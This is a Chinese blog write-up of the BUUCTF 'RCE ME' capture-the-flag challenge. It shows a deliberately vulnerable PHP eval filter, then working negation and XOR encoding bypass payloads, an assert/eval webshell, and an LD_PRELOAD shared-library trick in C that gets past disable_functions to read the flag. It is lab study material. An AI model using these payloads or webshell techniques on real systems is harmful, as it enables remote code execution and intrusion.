BUUCTF：[极客大挑战 2019]RCE ME —

本文链接：https://blog.csdn.net/m0_62879498/article/details/124803318

BUUCTF：[极客大挑战 2019]RCE ME

打开环境是代码审计题

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

代码审计很简单
我们上传的payload中不能含有大小写字母和数字
我们可以使用异或绕过和url编码取反绕过绕过

具体可以参考文章：PHP代码执行中出现过滤限制的绕过执行方法

在本关，我们要先访问 phpinfo 来查找被禁用的函数，从而进一步来构造我们的payload
.

查询禁用函数

异或和url取反在任意php版本下均可使用，所以两种方法均可使用。
url编码取反绕过
url编码取反绕过：就是我们将php代码url编码后取反，我们传入参数后服务端进行url解码，这时由于取反后，会url解码成不可打印字符，这样我们就会绕过。

即，对查询语句取反，然后编码。在编码前加上~进行取反，括号没有被过滤，不用取反。构造完的语句进行查询：

?code=(~%8F%97%8F%96%91%99%90)();

异或饶过
异或：将两个字符的ascii转化为二进制进行异或取值从而得到新的二进制转化为新的字符
eg：

字符：? ASCII码：63 二进制： 00‭11 1111‬
字符：~ ASCII码：126 二进制： 0111 1110‬
异或规则：
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
1 XOR 1 = 0
上述两个字符异或得到二进制： 0100 0001
该二进制的十进制也就是：65
对应的ASCII码是：A

paylaod

?code=(%22%80%80%80%80%80%80%80%22^%22%f0%e8%f0%e9%ee%e6%ef%22)();

在这里插入图片描述
disable_functions禁用函数过多
.

构造脚本

<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST[test]))';
$d=urlencode(~$c);
echo $d;
 ?>

我们先使用上面的php脚本获取url编码取反
在这里插入图片描述
然后拼接为 assert（eval($_POST[test])）

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);

在这里，我们不能直接使用eval 因为 eval并不是php函数所以为我们无法通过变量函数的方法进行调用。
在这里，我们使用 assert 来构造，但由于php版本问题，我们并不能直接构造<?php assert($_POST['a']);>,我们需要调用eval
拼接为 assert（eval($_POST[test])）

assert 可以将整个字符串参数当作php参数执行，但在 php7版本中
assert ( mixed $assertion [, Throwable $exception ] ) : bool
写不下去了…
有没有大佬解释下感觉主要还是因为Throwable $exception不知道对不对…

在这里插入图片描述
用蚁剑连接

由于 disable_functions的存在我们不能说直接读取flag，需要借助readflag来读取

获取flag

在获取flag的时候我们也有两种方法一种直接借助蚁剑中的插件进行绕过，一种是

借助蚁剑插件

在这里插入图片描述
/readflag

利用动态链接库—— LD_PRELOAD

因为 LD_PRELOAD允许我们在执行程序之前优先加载动态链接库。利用这个，我们就可以使用自己的函数，同时我们也可以向别人的程序注入恶意程序，从而达到我们的目的。

我们需要让我们编写的恶意elf文件优先启动我们书写的so文件访问即可获得flag

详细内容需要请关注这篇文章

突破思路：

创建新进程
用c编写我们的恶意代码，将其转化为 so文件
让我们的 so文件为LD_PRELOAD
让我们的 so文件优先加载
运行主体 php函数

做题步骤：
编写hack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
	system("cat /flag >> /var/tmp/test.php");
	system("tac /flag >> /var/tmp/test.php");
	system("more /flag >> /var/tmp/test.php");
	system("head -2 /flag >> /var/tmp/test.php");
	system("tail /flag >> /var/tmp/test.php");
	system("/readflag >> /var/tmp/test.php");
	
}   
int  geteuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
}

getenv：获取环境变量的值

unsetenv：用来删除一个环境变量

system：定的命令名称或程序名称传给要被命令处理器执行的主机环境

payload 函数大概是说查询 flag 并将flag返回到/var/tmp/文件夹下，flag返回形式为 test.php。
使用linux将我们的 .c 变为 so

gcc -shared -fPIC hack.c -o getflag.so

在这里插入图片描述

书写php文件

<?php
putenv("LD_PRELOAD=/var/tmp/getflag.so");
mail("","","","");
error_log("",1,"","");
?>

LD_PRELOAD=/var/tmp/getflag.so 意思是 LD_PRELOAD 是/var/tmp/文件夹下的 getflag.so 文件.

上传我们的 getflag.so 文件和 shell.php 文件
在这里插入图片描述

然后访问我们php文件即可（异或）

?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/shell.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/getflag.so